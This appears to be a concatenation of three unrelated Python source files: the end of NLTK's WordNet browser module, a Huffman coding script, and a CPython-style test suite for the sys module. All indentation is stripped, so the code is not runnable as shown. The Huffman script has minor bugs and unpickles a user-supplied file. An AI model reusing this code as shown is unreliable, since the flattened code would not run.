# Not all words of exc files are in the database, skip
# to the next word if a KeyError is raised.
try:
body += _collect_all_synsets(w, pos, href.synset_relations)
except KeyError:
pass
if not body:
body = "The word or words '%s' where not found in the dictionary." % word
return body, word
#####################################################################
# Static pages
#####################################################################
def get_static_page_by_path(path):
"""
Return a static HTML page from the path given.
"""
if path == "index_2.html":
return get_static_index_page(False)
elif path == "index.html":
return get_static_index_page(True)
elif path == "NLTK Wordnet Browser Database Info.html":
return "Display of Wordnet Database Statistics is not supported"
elif path == "upper_2.html":
return get_static_upper_page(False)
elif path == "upper.html":
return get_static_upper_page(True)
elif path == "web_help.html":
return get_static_web_help_page()
elif path == "wx_help.html":
return get_static_wx_help_page()
else:
return "Internal error: Path for static page '%s' is unknown" % path
def get_static_web_help_page():
"""
Return the static web help page.
"""
return """
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
<!-- Natural Language Toolkit: Wordnet Interface: Graphical Wordnet Browser
Copyright (C) 2001-2021 NLTK Project
Author: Jussi Salmela <jtsalmela@users.sourceforge.net>
URL: <https://www.nltk.org/>
For license information, see LICENSE.TXT -->
<head>
<meta http-equiv='Content-Type' content='text/html; charset=us-ascii'>
<title>NLTK Wordnet Browser display of: * Help *</title>
</head>
<body bgcolor='#F5F5F5' text='#000000'>
<h2>NLTK Wordnet Browser Help</h2>
<p>The NLTK Wordnet Browser is a tool to use in browsing the Wordnet database. It tries to behave like the Wordnet project's web browser but the difference is that the NLTK Wordnet Browser uses a local Wordnet database.
<p><b>You are using the Javascript client part of the NLTK Wordnet BrowseServer.</b> We assume your browser is in tab sheets enabled mode.</p>
<p>For background information on Wordnet, see the Wordnet project home page: <a href="https://wordnet.princeton.edu/"><b> https://wordnet.princeton.edu/</b></a>. For more information on the NLTK project, see the project home:
<a href="https://www.nltk.org/"><b>https://www.nltk.org/</b></a>. To get an idea of what the Wordnet version used by this browser includes choose <b>Show Database Info</b> from the <b>View</b> submenu.</p>
<h3>Word search</h3>
<p>The word to be searched is typed into the <b>New Word</b> field and the search started with Enter or by clicking the <b>Search</b> button. There is no uppercase/lowercase distinction: the search word is transformed to lowercase before the search.</p>
<p>In addition, the word does not have to be in base form. The browser tries to find the possible base form(s) by making certain morphological substitutions. Typing <b>fLIeS</b> as an obscure example gives one <a href="MfLIeS">this</a>. Click the previous link to see what this kind of search looks like and then come back to this page by using the <b>Alt+LeftArrow</b> key combination.</p>
<p>The result of a search is a display of one or more
<b>synsets</b> for every part of speech in which a form of the
search word was found to occur. A synset is a set of words
having the same sense or meaning. Each word in a synset that is
underlined is a hyperlink which can be clicked to trigger an
automatic search for that word.</p>
<p>Every synset has a hyperlink <b>S:</b> at the start of its
display line. Clicking that symbol shows you the name of every
<b>relation</b> that this synset is part of. Every relation name is a hyperlink that opens up a display for that relation. Clicking it another time closes the display again. Clicking another relation name on a line that has an opened relation closes the open relation and opens the clicked relation.</p>
<p>It is also possible to give two or more words or collocations to be searched at the same time separating them with a comma like this <a href="Mcheer up,clear up">cheer up,clear up</a>, for example. Click the previous link to see what this kind of search looks like and then come back to this page by using the <b>Alt+LeftArrow</b> key combination. As you could see the search result includes the synsets found in the same order than the forms were given in the search field.</p>
<p>
There are also word level (lexical) relations recorded in the Wordnet database. Opening this kind of relation displays lines with a hyperlink <b>W:</b> at their beginning. Clicking this link shows more info on the word in question.</p>
<h3>The Buttons</h3>
<p>The <b>Search</b> and <b>Help</b> buttons need no more explanation. </p>
<p>The <b>Show Database Info</b> button shows a collection of Wordnet database statistics.</p>
<p>The <b>Shutdown the Server</b> button is shown for the first client of the BrowServer program i.e. for the client that is automatically launched when the BrowServer is started but not for the succeeding clients in order to protect the server from accidental shutdowns.
</p></body>
</html>
"""
def get_static_welcome_message():
"""
Get the static welcome page.
"""
return """
<h3>Search Help</h3>
<ul><li>The display below the line is an example of the output the browser
shows you when you enter a search word. The search word was <b>green</b>.</li>
<li>The search result shows for different parts of speech the <b>synsets</b>
i.e. different meanings for the word.</li>
<li>All underlined texts are hypertext links. There are two types of links:
word links and others. Clicking a word link carries out a search for the word
in the Wordnet database.</li>
<li>Clicking a link of the other type opens a display section of data attached
to that link. Clicking that link a second time closes the section again.</li>
<li>Clicking <u>S:</u> opens a section showing the relations for that synset.</li>
<li>Clicking on a relation name opens a section that displays the associated
synsets.</li>
<li>Type a search word in the <b>Next Word</b> field and start the search by the
<b>Enter/Return</b> key or click the <b>Search</b> button.</li>
</ul>
"""
def get_static_index_page(with_shutdown):
"""
Get the static index page.
"""
template = """
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Frameset//EN" "http://www.w3.org/TR/html4/frameset.dtd">
<HTML>
<!-- Natural Language Toolkit: Wordnet Interface: Graphical Wordnet Browser
Copyright (C) 2001-2021 NLTK Project
Author: Jussi Salmela <jtsalmela@users.sourceforge.net>
URL: <https://www.nltk.org/>
For license information, see LICENSE.TXT -->
<HEAD>
<TITLE>NLTK Wordnet Browser</TITLE>
</HEAD>
<frameset rows="7%%,93%%">
<frame src="%s" name="header">
<frame src="start_page" name="body">
</frameset>
</HTML>
"""
if with_shutdown:
upper_link = "upper.html"
else:
upper_link = "upper_2.html"
return template % upper_link
def get_static_upper_page(with_shutdown):
"""
Return the upper frame page,
If with_shutdown is True then a 'shutdown' button is also provided
to shutdown the server.
"""
template = """
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
<!-- Natural Language Toolkit: Wordnet Interface: Graphical Wordnet Browser
Copyright (C) 2001-2021 NLTK Project
Author: Jussi Salmela <jtsalmela@users.sourceforge.net>
URL: <https://www.nltk.org/>
For license information, see LICENSE.TXT -->
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" />
<title>Untitled Document</title>
</head>
<body>
<form method="GET" action="search" target="body">
Current Word: <input type="text" id="currentWord" size="10" disabled>
Next Word: <input type="text" id="nextWord" name="nextWord" size="10">
<input name="searchButton" type="submit" value="Search">
</form>
<a target="body" href="web_help.html">Help</a>
%s
</body>
</html>
"""
if with_shutdown:
shutdown_link = '<a href="SHUTDOWN THE SERVER">Shutdown</a>'
else:
shutdown_link = ""
return template % shutdown_link
def usage():
"""
Display the command line help message.
"""
print(__doc__)
def app():
# Parse and interpret options.
(opts, _) = getopt.getopt(
argv[1:], "l:p:sh", ["logfile=", "port=", "server-mode", "help"]
)
port = 8000
server_mode = False
help_mode = False
logfilename = None
for (opt, value) in opts:
if (opt == "-l") or (opt == "--logfile"):
logfilename = str(value)
elif (opt == "-p") or (opt == "--port"):
port = int(value)
elif (opt == "-s") or (opt == "--server-mode"):
server_mode = True
elif (opt == "-h") or (opt == "--help"):
help_mode = True
if help_mode:
usage()
else:
wnb(port, not server_mode, logfilename)
if __name__ == "__main__":
app()
__all__ = ["app"]
|
huffman.py | import argparse
import pickle
import threading
import time
from bitstring import BitArray, BitStream, Bits, ConstBitStream
debug: bool = True
class Node:
freq: int
data: bytes
code = None # can change type from BitArray to Bits
l_child = None
r_child = None
def __init__(self, freq: int, data: bytes = None, l_child=None, r_child=None):
self.freq = freq
self.data = data
self.l_child = l_child
self.r_child = r_child
self.code = BitArray()
def get_child_count(self):
child_count = 1
if self.l_child is not None:
child_count += self.l_child.get_child_count()
if self.r_child is not None:
child_count += self.r_child.get_child_count()
return child_count
class HuffmanTree:
tree: Node = None
encode_dict = None # encode_dict: dict[bytes:Bits] = None
decode_dict = None # decode_dict: dict[Bits:bytes] = None
code_list = []
data_byte_count = None
encoded_bit_count = None
def __init__(self, data: bytes = None):
if data is None:
return
self.data_byte_count = len(data)
# 1. iterate over data, create Nodes for different bytes
node_list: list[Node] = []
for byte in data:
byte = byte.to_bytes(length=1, byteorder='big')
node = [node for node in node_list if node.data == byte]
node = None if len(node) == 0 else node[0]
if node is not None:
node.freq += 1
else:
node_list.append(Node(1, byte))
print(f'finished parsing data, {len(node_list)} different bytes found')
# 2. create tree by combining nodes until only one is left
while len(node_list) > 1:
node_list.sort(key=lambda curr_node: (curr_node.freq, curr_node.get_child_count()), reverse=True)
l_node, r_node = node_list.pop(), node_list.pop()
node_list.append(Node(l_node.freq + r_node.freq, l_child=l_node, r_child=r_node))
self.tree = node_list.pop()
# 3. traverse tree to set code. left traversal adds '0' to code, right traversal adds '1'
self.set_code(self.tree)
if debug:
self.print_tree(self.tree)
print(self.code_list.sort(key=lambda node: node[0]))
self.encode_dict = {}
self.decode_dict = {}
self.set_dicts(self.tree)
if debug:
print(self.encode_dict)
print(self.decode_dict)
def set_code(self, node: Node):
code: BitArray = node.code
if node.l_child is not None:
# append '0b0' to left child of node
node.l_child.code.append(code)
node.l_child.code.append('0b0')
self.set_code(node.l_child)
if node.r_child is not None:
# append '0b1' to left child of node
node.r_child.code.append(code)
node.r_child.code.append('0b1')
self.set_code(node.r_child)
def set_dicts(self, node: Node):
if node.data is not None:
if type(node.code) is BitArray:
node.code = Bits(node.code)
self.encode_dict[node.data] = node.code
self.decode_dict[node.code] = node.data
if node.l_child is not None:
self.set_dicts(node.l_child)
if node.r_child is not None:
self.set_dicts(node.r_child)
def print_tree(self, node: Node):
if node.data is not None:
print(f'freq: {node.freq} hex: {node.data.hex()} bin: {Bits(node.data).bin} ascii: {node.data} code: {node.code.bin}')
self.code_list.append((node.freq, f'freq: {node.freq} hex: {node.data.hex()} bin: {Bits(node.data).bin} ascii: {node.data} code: {node.code.bin}'))
if node.l_child is not None:
self.print_tree(node.l_child)
if node.r_child is not None:
self.print_tree(node.r_child)
def encode(self, data: bytes):
encoded_data = BitArray()
for byte in data:
byte = byte.to_bytes(length=1, byteorder='big')
if byte not in self.encode_dict:
print(f'encode error at \'{byte}\'')
return bytes()
encoded_data += self.encode_dict[byte]
self.encoded_bit_count = len(encoded_data)
# add pad to get a full byte
pad_len = len(encoded_data) % 8
if pad_len == 0:
print('no pad needed')
else:
bits = None
print(f'{pad_len} bits left to full byte')
for i in range(2 ** pad_len):
bits = Bits(int=i, length=pad_len)
valid_pad = True
for j in range(pad_len):
piece = Bits(bits[:j + 1])
if piece in self.decode_dict:
valid_pad = False
if valid_pad:
break
encoded_data += bits
pad_len = len(encoded_data) % 8
print(f'added {bits.bin}, {pad_len} bits left to full byte')
print(f'data size in bits: {self.data_byte_count*8}, encoded data size in bits: {len(encoded_data)}')
print(f'mean code length: {(len(encoded_data)/self.data_byte_count):.2f}')
return encoded_data.tobytes()
def decode(self, data: bytes):
decoded_data = bytes()
bit_stream = ConstBitStream(data)
print(f'total bits in stream: {len(bit_stream)}')
chunk_size = 2 ** 9
piece = BitArray()
global thread_orig_size
thread_orig_size = len(bit_stream)
global thread_size
while bit_stream.pos != len(bit_stream):
thread_size = bit_stream.pos
read_size = chunk_size if len(bit_stream) - bit_stream.pos > chunk_size else len(
bit_stream) - bit_stream.pos
chunk: BitStream = bit_stream.read(read_size)
# print(read_size, chunk)
piece = BitArray() if len(piece) == 0 else piece
while chunk.pos < len(chunk):
piece.append(chunk.read(1))
piece_as_bits = Bits(piece)
if piece_as_bits in self.decode_dict:
decoded_data += self.decode_dict[piece_as_bits]
piece = BitArray()
return decoded_data
thread_orig_size = 0
thread_size = 0
seconds = 0
def thread_log():
while True:
time.sleep(.5)
global seconds
seconds += .5
percent = (thread_size / thread_orig_size) * 100
print(
f'progress: {thread_size:10} / {thread_orig_size} :: {percent:2.2f}%')
if __name__ == '__main__':
arg_parser = argparse.ArgumentParser(description='Program to encode or decode a message using a Huffman Tree.')
arg_parser.add_argument('-m', '--mode', metavar='Mode', type=str, help='encrypt mode (e)\ndecrypt mode (d)',
choices=('e', 'd'), required=True)
arg_parser.add_argument('-i', '--file-in', metavar='Input File', type=str,
help='The file from which input will be read.', required=True)
arg_parser.add_argument('-o', '--file-out', metavar='Output File', type=str,
help='The file where output will be written.', required=True)
arg_parser.add_argument('-d', '--dict', metavar='Dict File', type=str,
help='Translation dictionary file path. In encode mode this file will be created/overwritten. In decode mode an existing dictionary file is required for translation.', required=True)
args = arg_parser.parse_args()
mode = args.mode
file_in = args.file_in
file_out = args.file_out
file_dict = args.dict
print(f'found mode {mode}, file_in {file_in}, file_out {file_out}, file_dict {file_dict}')
if mode == 'e':
# read file_in
bytes_in = open(file_in, 'rb').read()
# construct tree
tree = HuffmanTree(bytes_in)
# generate output
bytes_encoded = tree.encode(bytes_in)
# write output
file_o = open(file_out, 'wb')
file_o.write(bytes_encoded)
file_o.close()
# write dictionary
file_d = open(file_dict, 'wb')
file_d.write(pickle.dumps(tree.decode_dict))
file_d.close()
elif mode == 'd':
# read file_in
file = open(file_in, 'rb')
bytes_in = file.read()
# construct empty tree
tree = HuffmanTree()
# read dict
tree.decode_dict = pickle.loads(open(file_dict, 'rb').read())
# generate output
print(f'start decoding')
thread = threading.Thread(target=thread_log, daemon=True)
thread.start()
bytes_decoded = tree.decode(bytes_in)
print(f'progress: {thread_size:10} / {thread_orig_size} :: {(thread_size / thread_orig_size) * 100:2.2f}%')
print(f'seconds: {seconds}')
# write output
open(file_out, 'wb').write(bytes_decoded)
|
test_sys.py | import unittest, test.support
from test.support.script_helper import assert_python_ok, assert_python_failure
import sys, io, os
import struct
import subprocess
import textwrap
import warnings
import operator
import codecs
import gc
import sysconfig
import platform
# count the number of test runs, used to create unique
# strings to intern in test_intern()
numruns = 0
try:
import threading
except ImportError:
threading = None
class SysModuleTest(unittest.TestCase):
def setUp(self):
self.orig_stdout = sys.stdout
self.orig_stderr = sys.stderr
self.orig_displayhook = sys.displayhook
def tearDown(self):
sys.stdout = self.orig_stdout
sys.stderr = self.orig_stderr
sys.displayhook = self.orig_displayhook
test.support.reap_children()
def test_original_displayhook(self):
import builtins
out = io.StringIO()
sys.stdout = out
dh = sys.__displayhook__
self.assertRaises(TypeError, dh)
if hasattr(builtins, "_"):
del builtins._
dh(None)
self.assertEqual(out.getvalue(), "")
self.assertTrue(not hasattr(builtins, "_"))
dh(42)
self.assertEqual(out.getvalue(), "42\n")
self.assertEqual(builtins._, 42)
del sys.stdout
self.assertRaises(RuntimeError, dh, 42)
def test_lost_displayhook(self):
del sys.displayhook
code = compile("42", "<string>", "single")
self.assertRaises(RuntimeError, eval, code)
def test_custom_displayhook(self):
def baddisplayhook(obj):
raise ValueError
sys.displayhook = baddisplayhook
code = compile("42", "<string>", "single")
self.assertRaises(ValueError, eval, code)
def test_original_excepthook(self):
err = io.StringIO()
sys.stderr = err
eh = sys.__excepthook__
self.assertRaises(TypeError, eh)
try:
raise ValueError(42)
except ValueError as exc:
eh(*sys.exc_info())
self.assertTrue(err.getvalue().endswith("ValueError: 42\n"))
def test_excepthook(self):
with test.support.captured_output("stderr") as stderr:
sys.excepthook(1, '1', 1)
self.assertTrue("TypeError: print_exception(): Exception expected for " \
"value, str found" in stderr.getvalue())
# FIXME: testing the code for a lost or replaced excepthook in
# Python/pythonrun.c::PyErr_PrintEx() is tricky.
def test_exit(self):
# call with two arguments
self.assertRaises(TypeError, sys.exit, 42, 42)
# call without argument
with self.assertRaises(SystemExit) as cm:
sys.exit()
self.assertIsNone(cm.exception.code)
rc, out, err = assert_python_ok('-c', 'import sys; sys.exit()')
self.assertEqual(rc, 0)
self.assertEqual(out, b'')
self.assertEqual(err, b'')
# call with integer argument
with self.assertRaises(SystemExit) as cm:
sys.exit(42)
self.assertEqual(cm.exception.code, 42)
# call with tuple argument with one entry
# entry will be unpacked
with self.assertRaises(SystemExit) as cm:
sys.exit((42,))
self.assertEqual(cm.exception.code, 42)
# call with string argument
with self.assertRaises(SystemExit) as cm:
sys.exit("exit")
self.assertEqual(cm.exception.code, "exit")
# call with tuple argument with two entries
with self.assertRaises(SystemExit) as cm:
sys.exit((17, 23))
self.assertEqual(cm.exception.code, (17, 23))
# test that the exit machinery handles SystemExits properly
rc, out, err = assert_python_failure('-c', 'raise SystemExit(47)')
self.assertEqual(rc, 47)
self.assertEqual(out, b'')
self.assertEqual(err, b'')
def check_exit_message(code, expected, **env_vars):
rc, out, err = assert_python_failure('-c', code, **env_vars)
self.assertEqual(rc, 1)
self.assertEqual(out, b'')
self.assertTrue(err.startswith(expected),
"%s doesn't start with %s" % (ascii(err), ascii(expected)))
# test that stderr buffer is flushed before the exit message is written
# into stderr
check_exit_message(
r'import sys; sys.stderr.write("unflushed,"); sys.exit("message")',
b"unflushed,message")
# test that the exit message is written with backslashreplace error
# handler to stderr
check_exit_message(
r'import sys; sys.exit("surrogates:\uDCFF")',
b"surrogates:\\udcff")
# test that the unicode message is encoded to the stderr encoding
# instead of the default encoding (utf8)
check_exit_message(
r'import sys; sys.exit("h\xe9")',
b"h\xe9", PYTHONIOENCODING='latin-1')
def test_getdefaultencoding(self):
self.assertRaises(TypeError, sys.getdefaultencoding, 42)
# can't check more than the type, as the user might have changed it
self.assertIsInstance(sys.getdefaultencoding(), str)
# testing sys.settrace() is done in test_sys_settrace.py
# testing sys.setprofile() is done in test_sys_setprofile.py
def test_setcheckinterval(self):
with warnings.catch_warnings():
warnings.simplefilter("ignore")
self.assertRaises(TypeError, sys.setcheckinterval)
orig = sys.getcheckinterval()
for n in 0, 100, 120, orig: # orig last to restore starting state
sys.setcheckinterval(n)
self.assertEqual(sys.getcheckinterval(), n)
@unittest.skipUnless(hasattr(sys, 'getswitchinterval') and threading,
'New GIL & threading required for this test.')
def test_switchinterval(self):
self.assertRaises(TypeError, sys.setswitchinterval)
self.assertRaises(TypeError, sys.setswitchinterval, "a")
self.assertRaises(ValueError, sys.setswitchinterval, -1.0)
self.assertRaises(ValueError, sys.setswitchinterval, 0.0)
orig = sys.getswitchinterval()
# sanity check
self.assertTrue(orig < 0.5, orig)
try:
for n in 0.00001, 0.05, 3.0, orig:
sys.setswitchinterval(n)
self.assertAlmostEqual(sys.getswitchinterval(), n)
finally:
sys.setswitchinterval(orig)
def test_recursionlimit(self):
self.assertRaises(TypeError, sys.getrecursionlimit, 42)
oldlimit = sys.getrecursionlimit()
self.assertRaises(TypeError, sys.setrecursionlimit)
self.assertRaises(ValueError, sys.setrecursionlimit, -42)
sys.setrecursionlimit(10000)
self.assertEqual(sys.getrecursionlimit(), 10000)
sys.setrecursionlimit(oldlimit)
def test_recursionlimit_recovery(self):
if hasattr(sys, 'gettrace') and sys.gettrace():
self.skipTest('fatal error if run with a trace function')
oldlimit = sys.getrecursionlimit()
def f():
f()
try:
for depth in (10, 25, 50, 75, 100, 250, 1000):
try:
sys.setrecursionlimit(depth)
except RecursionError:
# Issue #25274: The recursion limit is too low at the
# current recursion depth
continue
# Issue #5392: test stack overflow after hitting recursion
# limit twice
self.assertRaises(RecursionError, f)
self.assertRaises(RecursionError, f)
finally:
sys.setrecursionlimit(oldlimit)
@test.support.cpython_only
def test_setrecursionlimit_recursion_depth(self):
# Issue #25274: Setting a low recursion limit must be blocked if the
# current recursion depth is already higher than the "lower-water
# mark". Otherwise, it may not be possible anymore to
# reset the overflowed flag to 0.
from _testcapi import get_recursion_depth
def set_recursion_limit_at_depth(depth, limit):
recursion_depth = get_recursion_depth()
if recursion_depth >= depth:
with self.assertRaises(RecursionError) as cm:
sys.setrecursionlimit(limit)
self.assertRegex(str(cm.exception),
"cannot set the recursion limit to [0-9]+ "
"at the recursion depth [0-9]+: "
"the limit is too low")
else:
set_recursion_limit_at_depth(depth, limit)
oldlimit = sys.getrecursionlimit()
try:
sys.setrecursionlimit(1000)
for limit in (10, 25, 50, 75, 100, 150, 200):
# formula extracted from _Py_RecursionLimitLowerWaterMark()
if limit > 200:
depth = limit - 50
else:
depth = limit * 3 // 4
set_recursion_limit_at_depth(depth, limit)
finally:
sys.setrecursionlimit(oldlimit)
@unittest.skipIf(True, 'Fixme: hangs with pypy')
def test_recursionlimit_fatalerror(self):
# A fatal error occurs if a second recursion limit is hit when recovering
# from a first one.
code = textwrap.dedent("""
import sys
def f():
try:
f()
except RecursionError:
f()
sys.setrecursionlimit(%d)
f()""")
with test.support.SuppressCrashReport():
for i in (50, 1000):
sub = subprocess.Popen([sys.executable, '-c', code % i],
stderr=subprocess.PIPE)
err = sub.communicate()[1]
self.assertTrue(sub.returncode, sub.returncode)
self.assertIn(
b"Fatal Python error: Cannot recover from stack overflow",
err)
def test_getwindowsversion(self):
# Raise SkipTest if sys doesn't have getwindowsversion attribute
test.support.get_attribute(sys, "getwindowsversion")
v = sys.getwindowsversion()
self.assertEqual(len(v), 5)
self.assertIsInstance(v[0], int)
self.assertIsInstance(v[1], int)
self.assertIsInstance(v[2], int)
self.assertIsInstance(v[3], int)
self.assertIsInstance(v[4], str)
self.assertRaises(IndexError, operator.getitem, v, 5)
self.assertIsInstance(v.major, int)
self.assertIsInstance(v.minor, int)
self.assertIsInstance(v.build, int)
self.assertIsInstance(v.platform, int)
self.assertIsInstance(v.service_pack, str)
self.assertIsInstance(v.service_pack_minor, int)
self.assertIsInstance(v.service_pack_major, int)
self.assertIsInstance(v.suite_mask, int)
self.assertIsInstance(v.product_type, int)
self.assertEqual(v[0], v.major)
self.assertEqual(v[1], v.minor)
self.assertEqual(v[2], v.build)
self.assertEqual(v[3], v.platform)
self.assertEqual(v[4], v.service_pack)
# This is how platform.py calls it. Make sure tuple
# still has 5 elements
maj, min, buildno, plat, csd = sys.getwindowsversion()
def test_call_tracing(self):
self.assertRaises(TypeError, sys.call_tracing, type, 2)
@unittest.skipUnless(hasattr(sys, "setdlopenflags"),
'test needs sys.setdlopenflags()')
def test_dlopenflags(self):
self.assertTrue(hasattr(sys, "getdlopenflags"))
self.assertRaises(TypeError, sys.getdlopenflags, 42)
oldflags = sys.getdlopenflags()
self.assertRaises(TypeError, sys.setdlopenflags)
sys.setdlopenflags(oldflags+1)
self.assertEqual(sys.getdlopenflags(), oldflags+1)
sys.setdlopenflags(oldflags)
@test.support.refcount_test
def test_refcount(self):
# n here must be a global in order for this test to pass while
# tracing with a python function. Tracing calls PyFrame_FastToLocals
# which will add a copy of any locals to the frame object, causing
# the reference count to increase by 2 instead of 1.
global n
self.assertRaises(TypeError, sys.getrefcount)
c = sys.getrefcount(None)
n = None
self.assertEqual(sys.getrefcount(None), c+1)
del n
self.assertEqual(sys.getrefcount(None), c)
if hasattr(sys, "gettotalrefcount"):
self.assertIsInstance(sys.gettotalrefcount(), int)
def test_getframe(self):
self.assertRaises(TypeError, sys._getframe, 42, 42)
self.assertRaises(ValueError, sys._getframe, 2000000000)
self.assertTrue(
SysModuleTest.test_getframe.__code__ \
is sys._getframe().f_code
)
# sys._current_frames() is a CPython-only gimmick.
@test.support.impl_detail("current_frames")
def test_current_frames(self):
have_threads = True
try:
import _thread
except ImportError:
have_threads = False
if have_threads:
self.current_frames_with_threads()
else:
self.current_frames_without_threads()
# Test sys._current_frames() in a WITH_THREADS build.
@test.support.reap_threads
def current_frames_with_threads(self):
import threading
import traceback
# Spawn a thread that blocks at a known place. Then the main
# thread does sys._current_frames(), and verifies that the frames
# returned make sense.
entered_g = threading.Event()
leave_g = threading.Event()
thread_info = [] # the thread's id
def f123():
g456()
def g456():
thread_info.append(threading.get_ident())
entered_g.set()
leave_g.wait()
t = threading.Thread(target=f123)
t.start()
entered_g.wait()
# At this point, t has finished its entered_g.set(), although it's
# impossible to guess whether it's still on that line or has moved on
# to its leave_g.wait().
self.assertEqual(len(thread_info), 1)
thread_id = thread_info[0]
d = sys._current_frames()
main_id = threading.get_ident()
self.assertIn(main_id, d)
self.assertIn(thread_id, d)
# Verify that the captured main-thread frame is _this_ frame.
frame = d.pop(main_id)
self.assertTrue(frame is sys._getframe())
# Verify that the captured thread frame is blocked in g456, called
# from f123. This is a litte tricky, since various bits of
# threading.py are also in the thread's call stack.
frame = d.pop(thread_id)
stack = traceback.extract_stack(frame)
for i, (filename, lineno, funcname, sourceline) in enumerate(stack):
if funcname == "f123":
break
else:
self.fail("didn't find f123() on thread's call stack")
self.assertEqual(sourceline, "g456()")
# And the next record must be for g456().
filename, lineno, funcname, sourceline = stack[i+1]
self.assertEqual(funcname, "g456")
self.assertIn(sourceline, ["leave_g.wait()", "entered_g.set()"])
# Reap the spawned thread.
leave_g.set()
t.join()
# Test sys._current_frames() when thread support doesn't exist.
def current_frames_without_threads(self):
# Not much happens here: there is only one thread, with artificial
# "thread id" 0.
d = sys._current_frames()
self.assertEqual(len(d), 1)
self.assertIn(0, d)
self.assertTrue(d[0] is sys._getframe())
def test_attributes(self):
self.assertIsInstance(sys.api_version, int)
self.assertIsInstance(sys.argv, list)
self.assertIn(sys.byteorder, ("little", "big"))
self.assertIsInstance(sys.builtin_module_names, tuple)
self.assertIsInstance(sys.copyright, str)
self.assertIsInstance(sys.exec_prefix, str)
self.assertIsInstance(sys.base_exec_prefix, str)
self.assertIsInstance(sys.executable, str)
self.assertEqual(len(sys.float_info), 11)
self.assertEqual(sys.float_info.radix, 2)
self.assertEqual(len(sys.int_info), 2)
if test.support.check_impl_detail(cpython=True):
self.assertTrue(sys.int_info.bits_per_digit % 5 == 0)
else:
self.assertTrue(sys.int_info.bits_per_digit >= 1)
self.assertTrue(sys.int_info.sizeof_digit >= 1)
self.assertEqual(type(sys.int_info.bits_per_digit), int)
self.assertEqual(type(sys.int_info.sizeof_digit), int)
self.assertIsInstance(sys.hexversion, int)
if test.support.check_impl_detail(cpython=True):
self.assertEqual(len(sys.hash_info), 9)
self.assertLess(sys.hash_info.modulus, 2**sys.hash_info.width)
# sys.hash_info.modulus should be a prime; we do a quick
# probable primality test (doesn't exclude the possibility of
# a Carmichael number)
for x in range(1, 100):
self.assertEqual(
pow(x, sys.hash_info.modulus-1, sys.hash_info.modulus),
1,
"sys.hash_info.modulus {} is a non-prime".format(
sys.hash_info.modulus)
)
self.assertIsInstance(sys.hash_info.inf, int)
self.assertIsInstance(sys.hash_info.nan, int)
self.assertIsInstance(sys.hash_info.imag, int)
if test.support.check_impl_detail(cpython=True):
algo = sysconfig.get_config_var("Py_HASH_ALGORITHM")
if sys.hash_info.algorithm in {"fnv", "siphash24"}:
self.assertIn(sys.hash_info.hash_bits, {32, 64})
self.assertIn(sys.hash_info.seed_bits, {32, 64, 128})
if algo == 1:
self.assertEqual(sys.hash_info.algorithm, "siphash24")
elif algo == 2:
self.assertEqual(sys.hash_info.algorithm, "fnv")
else:
self.assertIn(sys.hash_info.algorithm, {"fnv", "siphash24"})
else:
# PY_HASH_EXTERNAL
self.assertEqual(algo, 0)
self.assertGreaterEqual(sys.hash_info.cutoff, 0)
self.assertLess(sys.hash_info.cutoff, 8)
self.assertIsInstance(sys.maxsize, int)
self.assertIsInstance(sys.maxunicode, int)
self.assertEqual(sys.maxunicode, 0x10FFFF)
self.assertIsInstance(sys.platform, str)
self.assertIsInstance(sys.prefix, str)
self.assertIsInstance(sys.base_prefix, str)
self.assertIsInstance(sys.version, str)
vi = sys.version_info
self.assertIsInstance(vi[:], tuple)
self.assertEqual(len(vi), 5)
self.assertIsInstance(vi[0], int)
self.assertIsInstance(vi[1], int)
self.assertIsInstance(vi[2], int)
self.assertIn(vi[3], ("alpha", "beta", "candidate", "final"))
self.assertIsInstance(vi[4], int)
self.assertIsInstance(vi.major, int)
self.assertIsInstance(vi.minor, int)
self.assertIsInstance(vi.micro, int)
self.assertIn(vi.releaselevel, ("alpha", "beta", "candidate", "final"))
self.assertIsInstance(vi.serial, int)
self.assertEqual(vi[0], vi.major)
self.assertEqual(vi[1], vi.minor)
self.assertEqual(vi[2], vi.micro)
self.assertEqual(vi[3], vi.releaselevel)
self.assertEqual(vi[4], vi.serial)
self.assertTrue(vi > (1,0,0))
self.assertIsInstance(sys.float_repr_style, str)
self.assertIn(sys.float_repr_style, ('short', 'legacy'))
if not sys.platform.startswith('win'):
self.assertIsInstance(sys.abiflags, str)
@unittest.skipUnless(hasattr(sys, 'thread_info'),
'Threading required for this test.')
def test_thread_info(self):
info = sys.thread_info
self.assertEqual(len(info), 3)
self.assertIn(info.name, ('nt', 'pthread', 'solaris', None))
self.assertIn(info.lock, ('semaphore', 'mutex+cond', None))
def test_43581(self):
# Can't use sys.stdout, as this is a StringIO object when
# the test runs under regrtest.
self.assertEqual(sys.__stdout__.encoding, sys.__stderr__.encoding)
def test_intern(self):
global numruns
numruns += 1
self.assertRaises(TypeError, sys.intern)
s = "never interned before" + str(numruns)
self.assertTrue(sys.intern(s) is s)
s2 = s.swapcase().swapcase()
self.assertTrue(sys.intern(s2) is s)
# Subclasses of string can't be interned, because they
# provide too much opportunity for insane things to happen.
# We don't want them in the interned dict and if they aren't
# actually interned, we don't want to create the appearance
# that they are by allowing intern() to succeed.
class S(str):
def __hash__(self):
return 123
self.assertRaises(TypeError, sys.intern, S("abc"))
def test_sys_flags(self):
self.assertTrue(sys.flags)
attrs = ("debug",
"inspect", "interactive", "optimize", "dont_write_bytecode",
"no_user_site", "no_site", "ignore_environment", "verbose",
"bytes_warning", "quiet", "hash_randomization", "isolated")
for attr in attrs:
self.assertTrue(hasattr(sys.flags, attr), attr)
self.assertEqual(type(getattr(sys.flags, attr)), int, attr)
self.assertTrue(repr(sys.flags))
self.assertEqual(len(sys.flags), len(attrs))
def assert_raise_on_new_sys_type(self, sys_attr):
# Users are intentionally prevented from creating new instances of
# sys.flags, sys.version_info, and sys.getwindowsversion.
attr_type = type(sys_attr)
with self.assertRaises(TypeError):
attr_type()
with self.assertRaises(TypeError):
attr_type.__new__(attr_type)
def test_sys_flags_no_instantiation(self):
self.assert_raise_on_new_sys_type(sys.flags)
def test_sys_version_info_no_instantiation(self):
self.assert_raise_on_new_sys_type(sys.version_info)
def test_sys_getwindowsversion_no_instantiation(self):
# Skip if not being run on Windows.
test.support.get_attribute(sys, "getwindowsversion")
self.assert_raise_on_new_sys_type(sys.getwindowsversion())
